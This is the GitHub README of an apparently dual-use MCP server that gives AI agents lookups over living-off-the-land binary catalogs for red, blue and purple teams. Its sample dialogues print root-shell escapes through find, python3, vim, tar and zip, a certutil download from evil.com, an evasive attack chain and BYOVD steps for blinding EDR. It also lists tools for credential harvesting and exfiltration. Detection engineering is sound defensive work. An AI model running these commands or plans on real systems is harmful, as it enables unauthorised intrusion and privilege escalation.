badchars/living-off-the-land-lolbins-mcp-server

GitHub: badchars/living-off-the-land-lolbins-mcp-server

该 MCP 服务器将十个主流的 LOL 二进制文件情报目录统一整合为 59 个组合工具,让 AI 代理能够跨平台检索、关联滥用技巧并生成检测规则。

Stars: 1 | Forks: 1

English | 简体中文 | 繁體中文 | 한국어 | Deutsch | Español | Français | Italiano | Dansk | 日本語 | Polski | Русский | Bosanski | العربية | Norsk | Português (Brasil) | ไทย | Türkçe | Українська | বাংলা | Ελληνικά | Tiếng Việt | हिन्दी


living-off-the-land-lolbins-mcp-server

面向 AI 代理的 Living off the Land 情报。

GTFOBins, LOLBAS, LOOBins, LOLDrivers, LOLRMM, WADComs, LOLC2 等 — 统一整合到一个 MCP 服务器中。
你的 AI 代理将获得用于红队、蓝队和紫队行动的全频谱 LOL 二进制文件情报


痛点独特优势快速开始AI 能做什么工具 (59)数据源 (10)架构更新日志贡献指南

npm License Bun MCP 59 Tools 10 Sources

living-off-the-land-lolbins-mcp-server demo

## 痛点 Living off the Land 二进制文件情报是每一次红队对抗、紫队演练和检测工程工作流中缺失的一环。你需要滥用、检测和防御的二进制文件记录散落在 **10 多个目录**中,每个目录都有其自己的格式、schema 和平台侧重点: ``` Traditional LOL binary intel workflow: Linux privilege escalation -> GTFOBins web interface Windows LOL binaries -> LOLBAS project website macOS native binaries -> LOOBins web interface Vulnerable kernel drivers -> LOLDrivers project Abusable RMM tools -> LOLRMM project VMware ESXi binaries -> LOLESXi project Living off trusted platforms -> LOTP project C2 over legitimate services -> LOLC2 project Firmware/BIOS/cabinet abuse -> LOFLCAB project Active Directory attacks -> WADComs web interface cross-platform correlation -> copy-paste into a spreadsheet ATT&CK mapping -> manual lookup in Navigator detection rule writing -> start from scratch every time ──────────────────────────────────── Total: hours per engagement, most of it switching contexts and reformatting data ``` **living-off-the-land-lolbins-mcp-server** 通过 [Model Context Protocol](https://modelcontextprotocol.io) 为你的 AI 代理提供了跨越 10 个 LOL 目录的 59 个组合工具(共 321 个工具)。代理能够并行查询所有目录,跨平台关联二进制文件,发现提权路径,生成检测规则,并在单次对话中呈现出统一的攻击/防御全景。 ``` With living-off-the-land-lolbins-mcp-server: You: "I need to escalate privileges on a Linux box with curl, python3, and find available" Agent: -> lol_lookup {binary: "curl", platform: "linux"} -> lol_lookup {binary: "python3", platform: "linux"} -> lol_lookup {binary: "find", platform: "linux"} -> lol_privesc_paths {binaries: ["curl","python3","find"], platform: "linux"} -> lol_detect_rules {binary: "find", technique: "suid"} -> "3 escalation paths found: 1. find (SUID) — spawn shell via -exec: find . -exec /bin/sh -p \; -quit 2. python3 (SUID) — python3 -c 'import os; os.execl("/bin/sh","sh","-p")' 3. curl (sudo) — if sudo curl is allowed, file read via -o or write via -O MITRE ATT&CK: T1548.001 (Setuid/Setgid), T1059.006 (Python) Sigma rule generated for sysmon file creation + process exec patterns. Detection: monitor execve() calls from find/python3 with euid!=uid." ``` ## 独特优势 现有工具一次只能提供单个目录的原始数据。而 living-off-the-land-lolbins-mcp-server 赋予你的 AI 代理**同时跨所有 LOL 目录进行推理**的能力,用于攻击规划、防御验证和紫队演练。
传统方法 living-off-the-land-lolbins-mcp-server
接口 10 个不同的网站、wiki 和 GitHub 仓库 MCP — AI 代理以对话方式调用工具
数据源 一次查询一个目录 并行查询 10 个目录
跨平台 需分别针对 Linux、Windows、macOS、ESXi 进行查找 代理进行关联:“curl 同时存在于 Linux (GTFOBins)、Windows (LOLBAS) 和 macOS (LOOBins) 中,且在每个平台上有不同的滥用向量”
攻击图 手动绘制白板或使用电子表格 代理利用从初始访问到目标的 BFS/DFS 路径查找算法构建攻击图
检测 从零开始编写 Sigma/YARA 规则 代理为任何 LOL 二进制文件滥用技术生成 Sigma、YARA、Sysmon 和 EDR 查询
ATT&CK 映射 在 MITRE Navigator 中手动查找 代理将每项技术映射到 ATT&CK 并导出 Navigator 层
紫队 手动规划演练 代理生成包含红队步骤和蓝队验证标准的紫队演练方案
设置 收藏 10 个网站,学习 10 种 schema npx living-off-the-land-lolbins-mcp-server — 一条命令,零配置
## 快速开始 ### 选项 1:npx(免安装) ``` npx living-off-the-land-lolbins-mcp-server ``` 所有工具均可立即使用。无需 API 密钥 — 所有 10 个 LOL 目录均为开源数据。 ### 选项 2:克隆仓库 ``` git clone https://github.com/badchars/living-off-the-land-lolbins-mcp-server.git cd living-off-the-land-lolbins-mcp-server bun install ``` ### 连接到你的 AI 代理
Claude Code ``` # 使用 npx claude mcp add lolbins-mcp-server -- npx living-off-the-land-lolbins-mcp-server # 使用本地 clone claude mcp add lolbins-mcp-server -- bun run /path/to/living-off-the-land-lolbins-mcp-server/src/index.ts ```
Claude Desktop 添加到 `~/Library/Application Support/Claude/claude_desktop_config.json`: ``` { "mcpServers": { "lolbins": { "command": "npx", "args": ["-y", "living-off-the-land-lolbins-mcp-server"] } } } ```
Cursor / Windsurf / 其他 MCP 客户端 使用相同的 JSON 配置格式。将命令指向 `npx living-off-the-land-lolbins-mcp-server` 或你的本地安装路径。
### CLI 用法 ``` # 列出 composite tools (59) npx living-off-the-land-lolbins-mcp-server --list # 列出包含 sub-tools 的所有 tools (321) npx living-off-the-land-lolbins-mcp-server --list-all # 显示帮助 npx living-off-the-land-lolbins-mcp-server --help # 直接运行任意 tool npx living-off-the-land-lolbins-mcp-server --tool lol_lookup '{"binary":"curl","platform":"linux"}' npx living-off-the-land-lolbins-mcp-server --tool lol_privesc_paths '{"binaries":["find","python3"],"platform":"linux"}' npx living-off-the-land-lolbins-mcp-server --tool lol_detect_sigma '{"binary":"certutil.exe","technique":"download"}' npx living-off-the-land-lolbins-mcp-server --tool lol_driver_check '{"driver":"RTCore64.sys"}' ``` ### 开始查询 ``` You: "What LOL binaries on Windows can I use for lateral movement without dropping files to disk?" ``` 大功告成。代理会自动搜索 LOLBAS,与 ATT&CK 进行关联,检查检测覆盖率,并呈现完整的视图。 ## AI 能做什么 ### LOL 二进制文件查找与跨平台关联 ``` You: "Look up certutil.exe across all platforms and catalogs" Agent: -> lol_lookup {binary: "certutil.exe"} -> lol_cross_platform {binary: "certutil"} -> lol_attack_map {binary: "certutil.exe"} -> "certutil.exe — Windows LOL binary (LOLBAS): Functions: Download (ADS), Encode/Decode (Base64), Alternate Data Streams ATT&CK: T1140 (Deobfuscate), T1105 (Ingress Tool Transfer), T1564.004 (ADS) Commands: Download: certutil -urlcache -split -f http://evil.com/payload.exe out.exe Encode: certutil -encode payload.exe encoded.txt Decode: certutil -decode encoded.txt payload.exe Cross-platform equivalents: Linux: curl, wget, openssl (GTFOBins) macOS: curl, security (LOOBins) Detection: Sysmon EventID 1 (ProcessCreate) + EventID 11 (FileCreate) Sigma rule generated." ``` ### 提权路径发现 ``` You: "I have sudo access to vim, tar, and zip on Linux. Find escalation paths." Agent: -> lol_privesc_paths {binaries: ["vim","tar","zip"], platform: "linux"} -> lol_lookup {binary: "vim", platform: "linux"} -> lol_lookup {binary: "tar", platform: "linux"} -> lol_lookup {binary: "zip", platform: "linux"} -> "3 privilege escalation paths found: 1. vim (sudo) — :!/bin/sh — drops to root shell immediately 2. tar (sudo) — tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/sh — shell via checkpoint 3. zip (sudo) — zip /tmp/x.zip /etc/hosts -T -TT 'sh #' — shell via test command Risk: HIGH — all three provide immediate root shell MITRE: T1548.003 (Sudo and Sudo Caching) Remediation: restrict sudo to specific flags, use sudoers NOEXEC" ``` ### 检测工程 ``` You: "Generate detection rules for mshta.exe abuse" Agent: -> lol_detect_sigma {binary: "mshta.exe", technique: "execute"} -> lol_detect_yara {binary: "mshta.exe"} -> lol_detect_sysmon {binary: "mshta.exe"} -> lol_detect_edr {binary: "mshta.exe"} -> "Detection package for mshta.exe (LOLBAS): Sigma: Process creation rule matching mshta.exe spawning cmd.exe/powershell.exe + network connection rule YARA: Rule matching mshta.exe loading VBScript/JScript payloads Sysmon: EventID 1 (child process) + EventID 3 (network) config snippet provided EDR (KQL): DeviceProcessEvents query for mshta.exe with suspicious command-line patterns Coverage: T1218.005 (Mshta), T1059.005 (VBScript)" ``` ### 环境枚举与攻击规划 ``` You: "I'm on a Windows 10 box. Enumerate which LOL binaries are available and plan an attack chain." Agent: -> lol_enum_environment {platform: "windows", version: "10"} -> lol_attack_graph {platform: "windows", objective: "persistence"} -> lol_opsec_check {techniques: ["certutil","mshta","schtasks"]} -> "Windows 10 LOL binary inventory: 154 LOLBAS binaries available by default 12 LOLDrivers vulnerable drivers known for Win10 8 LOLRMM tools commonly present Attack chain (initial access -> persistence): 1. mshta.exe — execute HTA payload (T1218.005) 2. certutil.exe — download additional tools (T1105) 3. schtasks.exe — establish persistence (T1053.005) OPSEC warnings: - certutil download triggers Defender ATP alert - mshta.exe flagged by most EDR products - schtasks.exe is heavily monitored Alternatives with lower detection: - Use desktopimgdownldr.dll for download instead of certutil - Use msiexec for execution instead of mshta" ``` ### 紫队演练生成 ``` You: "Create a purple team exercise around LOLDrivers and BYOVD" Agent: -> lol_purple_exercise {topic: "BYOVD", catalogs: ["loldrivers"]} -> lol_driver_search {query: "kernel", vulnerable: true} -> lol_detect_rules {technique: "BYOVD"} -> "Purple Team Exercise: Bring Your Own Vulnerable Driver (BYOVD) Red Team Steps: 1. Deploy RTCore64.sys (known vulnerable, CVE-2019-16098) 2. Load driver via sc.exe create / sc.exe start 3. Use driver to disable kernel callbacks (EDR bypass) Blue Team Validation: 1. Verify driver load events (Sysmon EventID 6) 2. Check driver signature against LOLDrivers blocklist 3. Monitor for kernel callback removal Scoring: red success if EDR blind, blue success if detected in <5min MITRE: T1068 (Exploitation for Privilege Escalation) Caldera profile exported." ``` ## 工具参考(59 个组合工具)
核心 (3) — 基础的 LOL 二进制文件查找和搜索 | 工具 | 描述 | |------|-------------| | `lol_lookup` | 跨所有 10 个 LOL 目录查找特定的二进制文件/工具 — 返回功能、命令、ATT&CK 映射、检测说明 | | `lol_search` | 通过关键字、技术或 ATT&CK ID 跨所有目录进行全文搜索 | | `lol_list_catalogs` | 列出所有可用的 LOL 目录,包含条目数量、最后更新时间和状态 |
环境与图谱 (4) — 主机枚举和攻击图推理 | 工具 | 描述 | |------|-------------| | `lol_enum_environment` | 枚举目标平台/版本上可用的 LOL 二进制文件 — 返回可滥用二进制文件的完整清单 | | `lol_attack_graph` | 使用可用的 LOL 二进制文件和 BFS/DFS 路径查找算法,构建从初始访问到目标的攻击图 | | `lol_cross_platform` | 跨 Linux、Windows、macOS 和 ESXi 关联某个二进制文件 — 展示每个平台上等效的滥用技术 | | `lol_dependency_map` | 映射 LOL 二进制文件之间的依赖关系 — 哪些二进制文件会启用或链式调用其他文件 |
权限提升 (3) — 提权路径发现与分析 | 工具 | 描述 | |------|-------------| | `lol_privesc_paths` | 根据可用的二进制文件列表和当前访问权限,发现提权路径 | | `lol_suid_audit` | 根据 GTFOBins 审计 SUID/SGID 二进制文件,寻找可利用的提权向量 | | `lol_sudo_audit` | 根据 GTFOBins 审计 sudoers 条目,寻找通过 sudo 配置不当进行提权的方式 |
持久化 (2) — 持久化机制发现 | 工具 | 描述 | |------|-------------| | `lol_persist_techniques` | 枚举在目标平台上使用可用 LOL 二进制文件可实现的持久化技术 | | `lol_persist_detect` | 为 LOL 二进制文件的持久化机制(注册表键、计划任务、启动代理)生成检测逻辑 |
横向移动 (2) — 通过 LOL 二进制文件进行网络传播 | 工具 | 描述 | |------|-------------| | `lol_lateral_movement` | 寻找使用 LOL 二进制文件的横向移动技术 — WMI、PsExec 替代方案、SSH、RDP 枢纽 | | `lol_fileless_lateral` | 发现留下最少取证痕迹的无文件横向移动选项 |
防御规避 (5) — 规避技术和绕过方法 | 工具 | 描述 | |------|-------------| | `lol_evasion_techniques` | 枚举二进制文件的防御规避技术 — AMSI 绕过、ETW patching、日志规避 | | `lol_applocker_bypass` | 使用系统上存在的 LOL 二进制文件查找 AppLocker/WDAC 绕过技术 | | `lol_amsi_bypass` | 发现通过 LOL 二进制文件和 Windows 原生工具绕过 AMSI 的方法 | | `lol_log_evasion` | 寻找使用 LOL 二进制文件规避或篡改日志的技术 | | `lol_edr_bypass` | 发现使用 LOL 二进制文件和易受攻击的驱动程序绕过和致盲 EDR 的技术 |
凭据访问 (2) — 通过 LOL 二进制文件获取凭据 | 工具 | 描述 | |------|-------------| | `lol_credential_harvest` | 寻找使用 LOL 二进制文件进行凭据转储和收集的技术 — SAM、LSASS、keychain | | `lol_credential_store` | 枚举目标平台上可通过 LOL 二进制文件访问的凭据存储 |
执行 (3) — 代码和命令执行技术 | 工具 | 描述 | |------|-------------| | `lol_execute_techniques` | 枚举二进制文件的所有执行技术 — 命令执行、脚本托管、DLL 加载 | | `lol_execute_fileless` | 寻找使用 LOL 二进制文件的无文件执行方法 — 内存中执行、反射加载、Living off the Land | | `lol_execute_proxy` | 发现执行代理技术 — 可以间接执行其他二进制文件的二进制文件 |
发现与收集 (2) — 侦察和数据收集 | 工具 | 描述 | |------|-------------| | `lol_discovery_techniques` | 寻找使用 LOL 二进制文件的主机和网络发现技术 — 枚举、侦察、指纹识别 | | `lol_collection_techniques` | 枚举通过 LOL 二进制文件进行的数据收集和暂存技术 |
数据外传与 C2 (3) — 数据外传和命令与控制 | 工具 | 描述 | |------|-------------| | `lol_exfiltration` | 寻找使用 LOL 二进制文件的数据外传技术 — DNS、HTTP、ICMP、备用协议 | | `lol_c2_channels` | 发现使用合法服务和 LOL 二进制(LOLC2 目录)的 C2 信道选项 | | `lol_c2_profile` | 使用能与正常流量模式融合的 LOL 二进制文件生成 C2 配置文件 |
Payload 与混淆 (4) — Payload 生成和编码 | 工具 | 描述 | |------|-------------| | `lol_payload_generate` | 为给定的技术和平台生成 LOL 二进制文件滥用 Payload | | `lol_payload_encode` | 使用 LOL 二进制文件功能(certutil、base64、压缩)对 Payload 进行编码/混淆 | | `lol_payload_deliver` | 寻找使用 LOL 二进制文件的 Payload 传递方法 — 下载 cradle、分阶段传递 | | `lol_obfuscation` | 发现针对 LOL 二进制文件滥用命令的命令混淆技术 |
驱动程序、RMM 与 CI/CD (3) — 易受攻击的驱动程序、RMM 工具和固件 | 工具 | 描述 | |------|-------------| | `lol_driver_check` | 根据 LOLDrivers 数据库检查驱动程序 — 已知漏洞、已知恶意、CVE、哈希值 | | `lol_rmm_audit` | 根据 LOLRMM 目录审计已安装的 RMM 工具 — 识别可被滥用的远程管理软件 | | `lol_firmware_abuse` | 搜索 LOFLCAB 目录,查找固件、BIOS 和 cabinet 文件滥用技术 |
平台深度分析 (3) — 特定平台分析 | 工具 | 描述 | |------|-------------| | `lol_gtfobins_deep` | 针对 Linux 二进制文件深入分析 GTFOBins — 所有功能、shell 逃逸、文件操作 | | `lol_lolbas_deep` | 针对 Windows 二进制文件深入分析 LOLBAS — 所有功能、ATT&CK、检测、路径 | | `lol_esxi_deep` | 针对 ESXi 二进制文件滥用深入分析 LOLESXi — 虚拟机逃逸、hypervisor 操纵 |
OPSEC 与规划 (2) — 操作安全和行动规划 | 工具 | 描述 | |------|-------------| | `lol_opsec_check` | 评估一组 LOL 二进制文件技术的 OPSEC 风险 — 被检测可能性、EDR 覆盖范围、噪音水平 | | `lol_engagement_plan` | 使用 LOL 二进制文件为给定目标和约束生成完整的行动计划 |
威胁情报 (3) — 对手行为和威胁映射 | 工具 | 描述 | |------|-------------| | `lol_threat_actor_map` | 将 LOL 二进制文件的使用情况映射到已知的威胁行为者和 APT 组织 | | `lol_campaign_analysis` | 针对已知攻击活动和入侵集合分析一组 LOL 技术 | | `lol_trending_techniques` | 从近期威胁情报中获取最新的 LOL 二进制文件滥用技术趋势 |
取证与 IR (3) — 取证分析和事件响应 | 工具 | 描述 | |------|-------------| | `lol_forensic_artifacts` | 枚举 LOL 二进制文件滥用留下的取证痕迹 — 日志、注册表、prefetch、shimcache | | `lol_incident_timeline` | 将 LOL 二进制文件执行事件关联到事件时间线中 | | `lol_artifact_hunt` | 跨日志源生成用于搜寻 LOL 二进制文件滥用痕迹的取证查询 |
检测工程 (4) — 规则生成和覆盖率分析 | 工具 | 描述 | |------|-------------| | `lol_detect_sigma` | 为 LOL 二进制文件滥用技术生成 Sigma 检测规则 | | `lol_detect_yara` | 生成用于识别文件和内存中 LOL 二进制文件滥用模式的 YARA 规则 | | `lol_detect_sysmon` | 生成用于监控 LOL 二进制文件活动的 Sysmon 配置条目 | | `lol_detect_edr` | 生成用于检测 LOL 二进制文件的 EDR 查询 (KQL, SPL, EQL) |
蓝队分析 (3) — 防御态势评估 | 工具 | 描述 | |------|-------------| | `lol_coverage_gaps` | 分析你的环境中针对 LOL 二进制文件技术的检测覆盖率缺口 | | `lol_baseline_audit` | 审计 LOL 二进制文件执行基线,以识别异常的使用模式 | | `lol_red_vs_blue_score` | 针对蓝队对 LOL 二进制文件的检测能力为红队技术评分 |
AD 与 WADComs (1) — Active Directory 攻击 | 工具 | 描述 | |------|-------------| | `lol_wadcoms` | 搜索 WADComs 获取 Active Directory 攻击命令 — Kerberoasting、DCSync、Pass-the-Hash、委派滥用 |
报告与可视化 (3) — 导出和可视化 | 工具 | 描述 | |------|-------------| | `lol_report_export` | 将结果导出为结构化报告 — JSON、Markdown、CSV 格式 | | `lol_attack_navigator` | 导出用于 LOL 二进制文件技术覆盖率的 ATT&CK Navigator 层 JSON | | `lol_visualize_graph` | 生成攻击路径可视化 — Mermaid 图表、Graphviz DOT、ASCII 艺术 |
集成导出 (1) — 工具集成和自动化 | 工具 | 描述 | |------|-------------| | `lol_caldera_export` | 将 LOL 二进制文件攻击链导出为 MITRE Caldera 对手配置文件,用于自动化模拟 |
## 数据源 (10) | 目录 | 平台 | 条目 | 类型 | 提供的内容 | |---------|----------|---------|------|-----------------| | [GTFOBins](https://gtfobins.github.io) | Linux/Unix | 400+ | 静态/GitHub | 可用于提权、文件操作、shell 逃逸和 SUID 滥用的 Unix 二进制文件 | | [LOLBAS](https://lolbas-project.github.io) | Windows | 250+ | 静态/GitHub | 用于执行、规避和持久化的 Windows LOL 二进制文件、脚本和库 | | [LOOBins](https://www.loobins.io) | macOS | 50+ | 静态/GitHub | 可用于攻击性操作的 macOS 原生二进制文件 | | [LOLDrivers](https://www.loldrivers.io) | Windows (内核) | 700+ | API/GitHub | 用于 BYOVD 攻击的易受攻击和恶意的内核驱动程序 | | [LOLRMM](https://lolrmm.io) | 跨平台 | 100+ | 静态/GitHub | 被滥用于持久化和远程访问的合法 RMM 工具 | | [LOLESXi](https://lolesxi.com) | VMware ESXi | 30+ | 静态/GitHub | 用于虚拟机逃逸、hypervisor 操纵和勒索软件部署的 ESXi 二进制文件 | | [LOTP](https://lotp.github.io) | 跨平台 | 40+ | 静态/GitHub | 被滥用于恶意目的的受信任平台和服务 | | [LOLC2](https://lolc2.github.io) | 跨平台 | 30+ | 静态/GitHub | 被滥用作命令与控制信道的合法服务 | | [LOFLCAB](https://loflcab.github.io) | 跨平台 | 20+ | 静态/GitHub | 固件、BIOS 和 cabinet 文件滥用技术 | | [WADComs](https://wadcoms.github.io) | Windows AD | 150+ | 静态/GitHub | Active Directory 攻击命令和技术 | ## 架构 ``` src/ index.ts # CLI entrypoint (--help, --list, --list-all, --tool, stdio server) protocol/ mcp-server.ts # MCP server setup (stdio transport) tools.ts # Tool registry — all 59 composite tools + 321 total tools types/ index.ts # Shared types (ToolDef, ToolContext, ToolResult, CatalogEntry) schema/ catalog.ts # Unified catalog schema (Zod) technique.ts # ATT&CK technique schema binary.ts # Binary/tool schema utils/ rate-limiter.ts # Per-catalog rate limiter cache.ts # TTL cache for catalog data loader.ts # Catalog data loader (fetch + parse + normalize) updater.ts # Catalog auto-updater (check for new entries) catalogs/ gtfobins/ # GTFOBins parser and normalizer lolbas/ # LOLBAS parser and normalizer loobins/ # LOOBins parser and normalizer loldrivers/ # LOLDrivers parser and normalizer lolrmm/ # LOLRMM parser and normalizer lolesxi/ # LOLESXi parser and normalizer lotp/ # LOTP parser and normalizer lolc2/ # LOLC2 parser and normalizer loflcab/ # LOFLCAB parser and normalizer wadcoms/ # WADComs parser and normalizer index.ts # Catalog registry and loader index knowledge-base/ attack-map.ts # MITRE ATT&CK mapping engine binary-db.ts # Unified binary database (normalized from all catalogs) technique-db.ts # Technique database with cross-references environment/ enumerator.ts # Platform environment enumeration platform-profiles.ts # Default binary inventories per OS/version graph/ attack-graph.ts # Attack graph data structure pathfinder.ts # BFS/DFS path finding algorithms visualizer.ts # Mermaid, Graphviz, ASCII graph rendering providers/ core/ # Core lookup, search, list tools (3) environment/ # Environment & graph tools (4) privesc/ # Privilege escalation tools (3) persistence/ # Persistence tools (2) lateral/ # Lateral movement tools (2) evasion/ # Defense evasion tools (5) credential/ # Credential access tools (2) execution/ # Execution tools (3) discovery/ # Discovery & collection tools (2) exfiltration/ # Exfiltration & C2 tools (3) payload/ # Payload & obfuscation tools (4) drivers/ # Drivers, RMM, CI/CD tools (3) platform/ # Platform deep dive tools (3) opsec/ # OPSEC & planning tools (2) threat-intel/ # Threat intelligence tools (3) forensics/ # Forensics & IR tools (3) detection/ # Detection engineering tools (4) blue-team/ # Blue team analytics tools (3) ad/ # AD & WADComs tools (1) reporting/ # Reporting & visualization tools (3) integration/ # Integration export tools (1) composite/ index.ts # Composite tool orchestrator (chains sub-tools) scripts/ update-catalogs.ts # Script to fetch and update all catalog data build-knowledge-base.ts # Script to rebuild the unified knowledge base ``` **设计决策:** - **10 个目录,1 个服务器** — 每个 LOL 目录都是一个独立的模块,拥有自己的解析器和标准化器。代理会根据上下文选择要查询的目录。 - **统一知识库** — 所有 10 个目录都被标准化为通用的 schema,从而实现跨平台关联和攻击图推理。 - **组合工具** — 59 个组合工具编排了 321 个底层子工具,因此代理无需链接数十个调用即可获得高级功能。 - **攻击图引擎** — 在二进制依赖图上进行 BFS/DFS 路径查找,实现了自动化的提权路径发现和攻击链生成。 - **检测生成** — Sigma、YARA、Sysmon 和 EDR 查询模板是内置的,无需每次从头生成。 - **零 API 密钥** — 所有 10 个 LOL 目录均为开源数据。任何工具都不需要身份验证。 - **TTL 缓存** — 目录数据在本地缓存并具有可配置的 TTL,以避免在多工具工作流中出现冗余获取。 - **最小依赖** — `@modelcontextprotocol/sdk`、`zod` 和 `cheerio`。所有 HTTP 请求均通过原生 `fetch` 进行。 ## 系统要求 - **运行环境:** Bun 1.3.9+(推荐)或 Node.js 22+ - **操作系统:** macOS、Linux、Windows - **网络:** 需要互联网连接以进行初始目录获取(后续查询使用缓存) ## 局限性 - 目录数据的新鲜度取决于上游项目的更新频率 - GTFOBins 和 LOLBAS 拥有最全面的条目;较新的目录(LOFLCAB、LOLC2)条目较少 - 攻击图推理是基于启发式的 — 路径代表的是可能性,不保证能成功利用 - 检测规则是模板,可能需要针对特定环境进行调整 - LOLDrivers 漏洞数据仅涵盖已知的 CVE — 不包含 0-day 驱动漏洞 - WADComs 需要 Active Directory 上下文才能产生有意义的结果 - 已在 macOS / Linux 上进行测试(未在 Windows 上测试) ## MCP Security Suite 的一部分 | 项目 | 领域 | 工具 | |---|---|---| | [hackbrowser-mcp](https://github.com/badchars/hackbrowser-mcp) | 基于浏览器的安全测试 | 39 个工具,Firefox,注入测试 | | [cloud-audit-mcp](https://github.com/badchars/cloud-audit-mcp) | 云安全 (AWS/Azure/GCP) | 38 个工具,60+ 项检查 | | [github-security-mcp](https://github.com/badchars/github-security-mcp) | GitHub 安全态势 | 39 个工具,45 项检查 | | [cve-mcp](https://github.com/badchars/cve-mcp) | 漏洞情报 | 23 个工具,5 个数据源 | | [osint-mcp-server](https://github.com/badchars/osint-mcp-server) | OSINT 与侦察 | 37 个工具,12 个数据源 | | [darknet-mcp-server](https://github.com/badchars/darknet-mcp-server) | 暗网与威胁情报 | 66 个工具,16 个数据源 | | **living-off-the-land-lolbins-mcp-server** | **LOL 二进制文件情报** | **59 个组合工具,10 个目录** |

仅用于授权的安全测试和评估。
在对任何目标系统使用 LOL 二进制文件技术之前,请务必确保你已获得适当的授权。

MIT 许可证 • 使用 Bun + TypeScript 构建

标签:LOLBins, MCP, 威胁情报, 开发者工具, 暗色界面, 知识库安全, 红蓝紫队, 自动化攻击